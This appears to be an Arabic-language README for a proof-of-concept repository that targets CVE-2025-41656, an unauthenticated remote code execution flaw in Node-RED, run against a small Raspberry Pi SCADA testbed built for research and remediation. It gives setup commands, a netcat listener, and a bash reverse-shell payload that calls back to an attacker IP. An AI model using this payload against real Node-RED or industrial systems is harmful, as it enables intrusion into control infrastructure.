
يتضمن هذا المستودع الكود والملفات اللازمة لاختبار وتنفيذ PoC لـ CVE-2025-41656
هذا المشروع موجود لنمذجة CVE-2025-41656، وهي ثغرة تنفيذ كود عن بعد غير مصادق عليها لـ NodeRED. لنمذجة هذه الثغرة، قمنا بإنشاء نظام SCADA صغير الحجم باستخدام Raspberry Pi ومحرك ومستشعر. يحتوي Raspberry Pi على حاوية NodeRED وحاوية OpenPLC تتواصلان مع بعضهما عبر Modbus TCP للتحكم في المحرك. هذا نص بايثون لإثبات المفهوم لتنفيذ هجوم CVE-2025-41656. الهدف هو إنشاء PoC بنجاح وإيجاد إجراءات علاجية لتأمين النظام.
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
docker container ls
docker network inspect csci587-final-project_scadanet
nc -lvnp 1234NODE_RED_IP و NODE_RED_PORT بعنوان IP والمنفذ (1880) لخدمة NodeRED الخاصة بك في cve_2025_41656.py.cve_2025_41656، قم بتغيير عنوان IP في السطر "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", إلى عنوان IP للجهاز الذي تقوم بتشغيل الاستغلال منه.python3 cve_2025_41656.py